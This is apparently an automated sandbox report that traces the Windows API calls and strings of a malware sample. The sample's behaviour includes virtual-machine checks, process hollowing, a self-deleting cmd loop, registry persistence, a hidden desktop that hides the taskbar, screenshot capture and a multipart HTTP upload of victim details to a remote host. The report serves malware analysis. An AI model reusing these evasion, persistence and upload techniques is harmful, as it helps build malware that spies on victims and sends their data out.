      • Part of subcall function 00401A90: RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00401B02
      • Part of subcall function 00401A90: RegCloseKey.ADVAPI32 ref: 00401B0C
      • Part of subcall function 00401A90: CharUpperBuffA.USER32(?,?), ref: 00401B1C
      • Part of subcall function 00401A90: strstr.NTDLL(?), ref: 00401B2C
      • Part of subcall function 004013C0: _alloca_probe.NTDLL ref: 004013C5
      • Part of subcall function 004013C0: _snprintf.NTDLL ref: 004013EC
      • Part of subcall function 004013C0: RtlGetLastWin32Error.NTDLL ref: 004013F8
      • Part of subcall function 004013C0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00401419
      • Part of subcall function 004013C0: RtlGetLastWin32Error.NTDLL ref: 00401426
      • Part of subcall function 004013C0: memset.NTDLL(?,00000000), ref: 00401462
      • Part of subcall function 004013C0: DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0040148B
      • Part of subcall function 004013C0: RtlGetLastWin32Error.NTDLL ref: 00401495
      • Part of subcall function 004013C0: CloseHandle.KERNEL32 ref: 0040149E
      • Part of subcall function 004013C0: CloseHandle.KERNEL32 ref: 004014E1
      • Part of subcall function 004013C0: CloseHandle.KERNEL32 ref: 00401507
    • lstrlen.KERNEL32(?), ref: 00401B9D
    • CharUpperBuffA.USER32(?), ref: 00401BA5
    • lstrlen.KERNEL32(?), ref: 00401BAF
    • CharUpperBuffA.USER32(?), ref: 00401BBA
    • strstr.NTDLL(?), ref: 00401BC6
    • strstr.NTDLL(?), ref: 00401BE0
    • strstr.NTDLL(?), ref: 00401BFA
    • strstr.NTDLL(?), ref: 00401C14
    • strstr.NTDLL(?), ref: 00401C2E
    • strstr.NTDLL(?), ref: 00401C48
    • strstr.NTDLL(?), ref: 00401C65
    • strstr.NTDLL(?), ref: 00401C82
    • GetModuleHandleA.KERNEL32(00000000), ref: 00401CBF
    • GetModuleFileNameA.KERNEL32 ref: 00401CC6
    • lstrlen.KERNEL32(?), ref: 00401CD8
    • CharUpperBuffA.USER32(?), ref: 00401CE3
    • strstr.NTDLL(?), ref: 00401CF2
    • strstr.NTDLL(?), ref: 00401D0B
    • strstr.NTDLL(?), ref: 00401D24
    Strings
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00401092
    • GetModuleFileNameA.KERNEL32 ref: 00401099
    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010A8
    • _snprintf.NTDLL ref: 004010C7
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 004010DE
    • ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 004010F9
    Strings
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs: 004010B5
    • ComSpec, xrefs: 004010D9
    APIs
    • GetProcAddress.KERNEL32(?,LoadLibraryExA), ref: 00919648
    • LoadLibraryExA.KERNEL32(kernel32.dll,00000000,00000000), ref: 0091965C
    • GetProcAddress.KERNEL32(?), ref: 0091968C
    Strings
    APIs
    APIs
    • CreateFileA.KERNEL32(0091A040,40000000,00000003,00000000,00000004,00000080,00000000), ref: 009194FD
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 00919518
    • lstrlen.KERNEL32(000000FF), ref: 00919528
    • WriteFile.KERNEL32(000000FF,000000FF), ref: 00919537
    • WriteFile.KERNEL32(000000FF,00900300,00000001,?,00000000), ref: 0091954E
    • CloseHandle.KERNEL32(000000FF), ref: 00919558
    APIs
      • Part of subcall function 00919620: GetProcAddress.KERNEL32(?,LoadLibraryExA), ref: 00919648
      • Part of subcall function 00919620: LoadLibraryExA.KERNEL32(kernel32.dll,00000000,00000000), ref: 0091965C
      • Part of subcall function 00919620: GetProcAddress.KERNEL32(?), ref: 0091968C
    • GetModuleHandleA.KERNEL32(00000000), ref: 00919E4D
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00919E8D
      • Part of subcall function 00919DB0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919DC0
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919B5F
      • Part of subcall function 00919B20: UnmapViewOfFile.KERNEL32(00400000), ref: 00919C11
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00919C32
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C4C
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C6D
      • Part of subcall function 00919B20: VirtualProtect.KERNEL32(00000000,00000006,00000040,?), ref: 00919D89
    Strings
    APIs
    • GetTempPathA.KERNEL32(00000104,0091A040), ref: 009194BD
    • lstrcat.KERNEL32(0091A040,\__t34t), ref: 009194CD
    Strings
    APIs
    • GetModuleHandleA.KERNEL32(00404004), ref: 00401E17
    Strings
    • RtlGetCompressionWorkSpaceSize, xrefs: 00401E00
    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?), ref: 0040255E
    APIs
    • RtlUnwind.NTDLL(004022FD,004023B0,00000000,00000000,?,?,?,?,?,004022FD), ref: 004023AB
    Executed Functions
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00413444
    • GetThreadDesktop.USER32 ref: 0041344B
    • OpenInputDesktop.USER32(00000000,00000000,00000100), ref: 0041345E
    • CreateDesktopA.USER32(ksnAAbF5z6QDY5hrrDAZb3n,00000000,00000000,00000000,10000000,00000000), ref: 0041347A
    • RtlGetLastWin32Error.NTDLL ref: 00413486
    • SetThreadDesktop.USER32 ref: 0041349B
    • SwitchDesktop.USER32 ref: 004134A4
    • CreateThread.KERNEL32(00000000,00000000,00412AB0), ref: 004134B7
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004134C6
    • CloseHandle.KERNEL32 ref: 004134CD
    • SwitchDesktop.USER32(?), ref: 004134D8
    • SetThreadDesktop.USER32(?), ref: 004134DF
    • CloseDesktop.USER32 ref: 004134E2
    Strings
    • ksnAAbF5z6QDY5hrrDAZb3n, xrefs: 00413471
    APIs
      • Part of subcall function 00401320: GetModuleHandleW.KERNEL32(00000000), ref: 00401337
      • Part of subcall function 00401320: strncpy.NTDLL(?,?), ref: 00401364
      • Part of subcall function 00401320: lstrlen.KERNEL32(?), ref: 00401371
      • Part of subcall function 00401320: strrchr.NTDLL(?,0000005C), ref: 00401381
      • Part of subcall function 00401320: GetVersionExW.KERNEL32(?), ref: 004013A2
      • Part of subcall function 00401320: SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 004013C6
      • Part of subcall function 00401320: RtlGetLastWin32Error.NTDLL ref: 004013D0
      • Part of subcall function 00401320: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004013ED
      • Part of subcall function 00401320: lstrcat.KERNEL32(?,00419500), ref: 004013FF
      • Part of subcall function 00401320: lstrcat.KERNEL32(?,?), ref: 00401403
    • GetVersionExW.KERNEL32(?), ref: 00401444
    • SHDeleteKeyA.SHLWAPI(80000001), ref: 0040147A
    • SHDeleteKeyA.SHLWAPI(80000002), ref: 0040148D
    • CopyFileA.KERNEL32(?,?,00000000), ref: 004014A9
    • lstrcmpi.KERNEL32(?), ref: 004014BB
      • Part of subcall function 00401190: RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 004011CF
      • Part of subcall function 00401190: lstrlen.KERNEL32(?), ref: 004011DC
      • Part of subcall function 00401190: RegSetValueExA.ADVAPI32(?,Update,?,00000001,?), ref: 004011F1
      • Part of subcall function 00401190: RegCloseKey.ADVAPI32(?), ref: 004011FA
      • Part of subcall function 00401220: RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 0040125F
      • Part of subcall function 00401220: RegDeleteValueA.ADVAPI32(?,Update), ref: 0040127F
      • Part of subcall function 00401220: RegCloseKey.ADVAPI32(?), ref: 0040128A
      • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019), ref: 004012C4
      • Part of subcall function 004012A0: RegDeleteValueA.ADVAPI32 ref: 004012E5
      • Part of subcall function 004012A0: RegDeleteValueA.ADVAPI32(00000000), ref: 004012F8
      • Part of subcall function 004012A0: RegDeleteValueA.ADVAPI32(00000000), ref: 0040130A
      • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(00000000), ref: 00401311
    • DeleteFileA.KERNEL32 ref: 004014EC
      • Part of subcall function 004010C0: GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
      • Part of subcall function 004010C0: strncpy.NTDLL(?,?), ref: 00401106
      • Part of subcall function 004010C0: lstrlen.KERNEL32(?), ref: 00401116
      • Part of subcall function 004010C0: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
      • Part of subcall function 004010C0: _snprintf.NTDLL ref: 00401145
      • Part of subcall function 004010C0: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
      • Part of subcall function 004010C0: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    APIs
    • GetTickCount.KERNEL32 ref: 004150D0
    • LocalAlloc.KERNEL32(00000000), ref: 004150F5
    • RtlGetLastWin32Error.NTDLL ref: 004150FF
    • memcpy.NTDLL(?,?,?,?,?,7C80AC61,?,7C80BE56), ref: 00415113
    • closesocket.WS2_32 ref: 0041558E
      • Part of subcall function 00413930: memset.NTDLL(?,00000000), ref: 00413942
      • Part of subcall function 00413930: GetCurrentHwProfileW.ADVAPI32 ref: 0041394E
    • _snprintf.NTDLL ref: 00415155
      • Part of subcall function 00414CB0: _alldiv.NTDLL ref: 00414CC6
    • LocalAlloc.KERNEL32(00000000), ref: 00415185
    • memset.NTDLL(?,00000000), ref: 0041519B
    • LocalAlloc.KERNEL32(00000000,00008000), ref: 004151B2
    • memset.NTDLL(?,00000000), ref: 004151CA
    • LocalAlloc.KERNEL32(00000000), ref: 004151DE
    • memset.NTDLL(?,00000000), ref: 004151F0
      • Part of subcall function 00414D30: memset.NTDLL(?,0000003D), ref: 00414EBD
    • socket.WS2_32(00000002,00000001,00000006), ref: 00415254
    • htons.WS2_32(00000050), ref: 0041528B
    • gethostbyname.WS2_32(?), ref: 0041529E
    • memcpy.NTDLL(?), ref: 004152B8
    • connect.WS2_32(?,?,00000010), ref: 004152C8
    • inet_addr.WS2_32(?), ref: 004152DC
    • _snprintf.NTDLL ref: 00415310
    • _snprintf.NTDLL ref: 0041532D
    • _snprintf.NTDLL ref: 00415379
    • send.WS2_32(?,?,?,00000000), ref: 0041544E
    • memset.NTDLL(?,00000000), ref: 00415464
    • recv.WS2_32(?,?,00008000,00000000), ref: 00415480
    • recv.WS2_32(?,?,00008000,00000000), ref: 00415499
      • Part of subcall function 004125A0: lstrcmp.KERNEL32 ref: 004125DD
    • strstr.NTDLL ref: 004154DA
      • Part of subcall function 00414FF0: LocalAlloc.KERNEL32(00000000), ref: 00414FFD
      • Part of subcall function 00414FF0: memset.NTDLL(?,00000000), ref: 0041501B
      • Part of subcall function 00414FF0: LocalFree.KERNEL32 ref: 00415042
      • Part of subcall function 00414FF0: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,71AB676F), ref: 0041508F
      • Part of subcall function 00414FF0: LocalFree.KERNEL32 ref: 00415098
    • LocalFree.KERNEL32(?), ref: 00415564
    • LocalFree.KERNEL32 ref: 0041556F
    • LocalFree.KERNEL32(?), ref: 0041557E
    • LocalFree.KERNEL32(?), ref: 00415599
    Strings
    • %lu, xrefs: 00415143
    • --%uContent-Disposition: form-data; name="data"; filename="%s"Content-Type: application/octet-stream, xrefs: 00415305
    • --%d--, xrefs: 00415321
    • POST /%s HTTP/1.1Content-Type: multipart/form-data; boundary=%uHost: %sConnection: closeCache-Control: no-cacheContent-Length: %ld, xrefs: 00415372
    • HTTP/1.1 200, xrefs: 0041549F
    • , xrefs: 004154D4
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00412797
    • strncpy.NTDLL(?,?), ref: 004127C7
    • lstrlen.KERNEL32(?), ref: 004127D4
    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 004127F2
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
      • Part of subcall function 004010C0: GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
      • Part of subcall function 004010C0: strncpy.NTDLL(?,?), ref: 00401106
      • Part of subcall function 004010C0: lstrlen.KERNEL32(?), ref: 00401116
      • Part of subcall function 004010C0: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
      • Part of subcall function 004010C0: _snprintf.NTDLL ref: 00401145
      • Part of subcall function 004010C0: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
      • Part of subcall function 004010C0: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    • ExitProcess.KERNEL32(00000661), ref: 0041281D
    • WSAStartup.WS2_32(00000202,?), ref: 00412830
    • RtlGetLastWin32Error.NTDLL ref: 00412839
      • Part of subcall function 00401940: VirtualAlloc.KERNEL32(00000000,0000EB59,00001000,00000004), ref: 00401970
      • Part of subcall function 00401940: VirtualAlloc.KERNEL32(00000000,01010008,00001000,00000004), ref: 004019E4
      • Part of subcall function 00401940: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A18
      • Part of subcall function 00401940: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A48
      • Part of subcall function 00401940: VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401A52
    • OleUninitialize.OLE32 ref: 00412A88
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    • ExitProcess.KERNEL32(00000663), ref: 00412887
      • Part of subcall function 004107C0: GetSystemTime.KERNEL32(?), ref: 004107D0
      • Part of subcall function 004107C0: SystemTimeToFileTime.KERNEL32(?,?), ref: 004107E0
      • Part of subcall function 004107C0: RtlTimeToSecondsSince1970.NTDLL ref: 004107F8
    • SetTimer.USER32(00000000,00000000,0000000A,00413B80), ref: 004128B2
    • RtlGetLastWin32Error.NTDLL ref: 004128C2
    • ExitProcess.KERNEL32(00000001), ref: 004128D7
      • Part of subcall function 00410BB0: strncmp.NTDLL(Anonymous Proxy, , ), ref: 00410CF3
      • Part of subcall function 00410BB0: GetProcessHeap.KERNEL32 ref: 00410D84
      • Part of subcall function 00410BB0: RtlFreeHeap.NTDLL ref: 00410D8B
      • Part of subcall function 00401410: GetVersionExW.KERNEL32(?), ref: 00401444
      • Part of subcall function 00401410: SHDeleteKeyA.SHLWAPI(80000001), ref: 0040147A
      • Part of subcall function 00401410: SHDeleteKeyA.SHLWAPI(80000002), ref: 0040148D
      • Part of subcall function 00401410: CopyFileA.KERNEL32(?,?,00000000), ref: 004014A9
      • Part of subcall function 00401410: lstrcmpi.KERNEL32(?), ref: 004014BB
      • Part of subcall function 00401410: DeleteFileA.KERNEL32 ref: 004014EC
    • memset.NTDLL(?,00000000), ref: 004128FD
    • GetVersionExW.KERNEL32(?), ref: 00412912
      • Part of subcall function 00413930: memset.NTDLL(?,00000000), ref: 00413942
      • Part of subcall function 00413930: GetCurrentHwProfileW.ADVAPI32 ref: 0041394E
    • GetSystemDefaultLangID.KERNEL32(?,?,00000001), ref: 00412933
    • GetSystemMetrics.USER32(00000000), ref: 00412944
    • GetSystemMetrics.USER32(00000001), ref: 0041294A
      • Part of subcall function 00410E10: _vsnprintf.NTDLL(ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV,000003FF,?,?,?,7E418F9C,00412995,?,00000000,00000000,00000000,00000003,000018E1,?,83868CF7), ref: 00410E3A
    • RtlGetLastWin32Error.NTDLL ref: 0041299C
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 00412677
      • Part of subcall function 00412660: RtlAllocateHeap.NTDLL(?,?,7E418F9C), ref: 0041267A
      • Part of subcall function 00412660: memset.NTDLL(?,00000000), ref: 0041268E
      • Part of subcall function 00412660: ExitProcess.KERNEL32(00001B8B), ref: 004126B6
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 004126E9
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 004126EC
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412715
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412737
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412759
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 0041276A
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 00412771
    • GetModuleHandleW.KERNEL32(00000000), ref: 004129B8
      • Part of subcall function 00418310: OleInitialize.OLE32(00000000), ref: 00418315
      • Part of subcall function 00418310: LoadCursorW.USER32 ref: 0041835D
      • Part of subcall function 00418310: RegisterClassW.USER32 ref: 0041837F
    • LocalAlloc.KERNEL32(00000040,000000D4), ref: 004129DA
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 004129F9
    • GetSystemMetrics.USER32(00000000), ref: 00412A0C
    • GetSystemMetrics.USER32(00000001), ref: 00412A12
      • Part of subcall function 004183A0: DestroyWindow.USER32(00000008), ref: 004183BD
      • Part of subcall function 004183A0: CreateWindowExW.USER32 ref: 00418406
      • Part of subcall function 004183A0: RtlGetLastWin32Error.NTDLL ref: 00418418
      • Part of subcall function 00418430: GetWindow.USER32(00000008,00000004), ref: 00418448
      • Part of subcall function 00418430: EnableWindow.USER32(?,00000000), ref: 00418458
      • Part of subcall function 00418430: GetMessageW.USER32(00000008,00000005), ref: 0041846F
      • Part of subcall function 00418430: KiUserApcDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0041848B
      • Part of subcall function 00418430: TranslateMessage.USER32(?), ref: 004184AD
      • Part of subcall function 00418430: DispatchMessageW.USER32(?), ref: 004184B8
      • Part of subcall function 00418430: EnableWindow.USER32(?,00000001), ref: 004184C7
      • Part of subcall function 00412BC0: LocalFree.KERNEL32 ref: 00412BE3
    • UnregisterClassW.USER32(59FFB769-5787-4181-A4F0-949BF67A7793,00400000), ref: 00412A82
    Strings
    • QnY8EHt, xrefs: 004127A2
    • FiberMax Networks BV, xrefs: 00412952
    • Anonymous Proxy, xrefs: 00412957
    • 178.18.17.204, xrefs: 0041295C
    • ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV, xrefs: 0041298B
    • 59FFB769-5787-4181-A4F0-949BF67A7793, xrefs: 00412A7D
    APIs
    • CoCreateInstance.OLE32(00419288,00000000,00000001,0041988C,p~7), ref: 00414221
    • CoCreateInstance.OLE32(00419278,00000000,00000001,004192E8,0041BA90), ref: 00414242
    • CoCreateInstance.OLE32(00419298,00000000,00000001,0041993C,0041BA7C), ref: 00414284
    • CoCreateInstance.OLE32(0041986C,00000000,00000001,0041989C,0041BA98), ref: 00414381
    • memset.NTDLL(?,00000000), ref: 004143D7
    • CoCreateInstance.OLE32(0041987C,00000000,00000001,0041989C,0041BAA0), ref: 00414484
      • Part of subcall function 00414120: GetProcessHeap.KERNEL32 ref: 0041412C
      • Part of subcall function 00414120: RtlFreeHeap.NTDLL ref: 00414133
    • GetProcessHeap.KERNEL32 ref: 0041457E
    • RtlAllocateHeap.NTDLL ref: 00414585
    • RtlGetLastWin32Error.NTDLL ref: 00414594
    • CreateFileW.KERNEL32(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00414659
    • RtlGetLastWin32Error.NTDLL ref: 00414666
    • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 004146A3
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004146B2
    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004146C8
    • CloseHandle.KERNEL32 ref: 004146CB
    • CoTaskMemFree.OLE32(?), ref: 004146DC
    Strings
    APIs
    • GetProcessHeap.KERNEL32 ref: 00413528
    • RtlAllocateHeap.NTDLL(?,?,7C90FE21), ref: 0041352B
    • InternetOpenA.WININET(Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0),00000001,00000000,00000000,00000000), ref: 0041354D
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,04080000,00000000), ref: 0041356C
    • RtlGetLastWin32Error.NTDLL ref: 0041357A
    • GetProcessHeap.KERNEL32 ref: 00413583
    • RtlFreeHeap.NTDLL ref: 00413586
    • GetProcessHeap.KERNEL32 ref: 004135A5
    • RtlAllocateHeap.NTDLL(?,?,?), ref: 004135A8
    • InternetReadFile.WININET(00000000,?,00010000,?), ref: 004135CD
    • GetProcessHeap.KERNEL32 ref: 004135F3
    • RtlReAllocateHeap.NTDLL(?,?,00040000), ref: 004135F6
    • memcpy.NTDLL(?,?,?,?,00010000,?,?,?,?), ref: 00413613
    • InternetReadFile.WININET(?,?,00010000,?), ref: 0041363F
    • InternetCloseHandle.WININET(00000000), ref: 00413654
    • InternetCloseHandle.WININET(?), ref: 00413663
    • GetProcessHeap.KERNEL32 ref: 0041366C
    • RtlFreeHeap.NTDLL ref: 0041366F
    Strings
    • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0), xrefs: 00413548
    APIs
    Strings
    APIs
    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000), ref: 00410871
    • lstrlen.KERNEL32(178.18.17.204), ref: 0041088A
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410894
    • lstrlen.KERNEL32(178.18.17.204), ref: 004108C2
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004108E5
    • lstrlen.KERNEL32(Anonymous Proxy), ref: 004108F6
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410900
    • lstrlen.KERNEL32(Anonymous Proxy), ref: 0041092E
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 0041094C
    • lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410959
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410963
    • lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410991
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004109AF
    • RegCloseKey.ADVAPI32(?), ref: 004109B8
    Strings
    APIs
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
      • Part of subcall function 004010C0: GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
      • Part of subcall function 004010C0: strncpy.NTDLL(?,?), ref: 00401106
      • Part of subcall function 004010C0: lstrlen.KERNEL32(?), ref: 00401116
      • Part of subcall function 004010C0: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
      • Part of subcall function 004010C0: _snprintf.NTDLL ref: 00401145
      • Part of subcall function 004010C0: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
      • Part of subcall function 004010C0: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    • ExitProcess.KERNEL32(00000661), ref: 00401025
    • SetWindowPos.USER32(00000000,Program Manager), ref: 0040104B
    • SetWindowPos.USER32 ref: 00401054
    • ShowWindow.USER32(Shell_TrayWnd,00000000), ref: 0040105D
    • ShowWindow.USER32(?,00000000), ref: 0040106E
    • UpdateWindow.USER32 ref: 00401071
      • Part of subcall function 00413440: GetCurrentThreadId.KERNEL32 ref: 00413444
      • Part of subcall function 00413440: GetThreadDesktop.USER32 ref: 0041344B
      • Part of subcall function 00413440: OpenInputDesktop.USER32(00000000,00000000,00000100), ref: 0041345E
      • Part of subcall function 00413440: CreateDesktopA.USER32(ksnAAbF5z6QDY5hrrDAZb3n,00000000,00000000,00000000,10000000,00000000), ref: 0041347A
      • Part of subcall function 00413440: RtlGetLastWin32Error.NTDLL ref: 00413486
      • Part of subcall function 00413440: SetThreadDesktop.USER32 ref: 0041349B
      • Part of subcall function 00413440: SwitchDesktop.USER32 ref: 004134A4
      • Part of subcall function 00413440: CreateThread.KERNEL32(00000000,00000000,00412AB0), ref: 004134B7
      • Part of subcall function 00413440: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004134C6
      • Part of subcall function 00413440: CloseHandle.KERNEL32 ref: 004134CD
      • Part of subcall function 00413440: SwitchDesktop.USER32(?), ref: 004134D8
      • Part of subcall function 00413440: SetThreadDesktop.USER32(?), ref: 004134DF
      • Part of subcall function 00413440: CloseDesktop.USER32 ref: 004134E2
    • FindWindowA.USER32(00000000,Program Manager), ref: 0040108F
    • SetWindowPos.USER32(?,?,?,00000000), ref: 00401092
    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040109B
    • ShowWindow.USER32(?,00000005), ref: 004010A6
    • UpdateWindow.USER32 ref: 004010A9
    • ExitProcess.KERNEL32(00000000), ref: 004010B1
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    Strings
    • Program Manager, xrefs: 00401044, 00401088
    • Shell_TrayWnd, xrefs: 00401058, 00401096
    • QnY8EHt, xrefs:
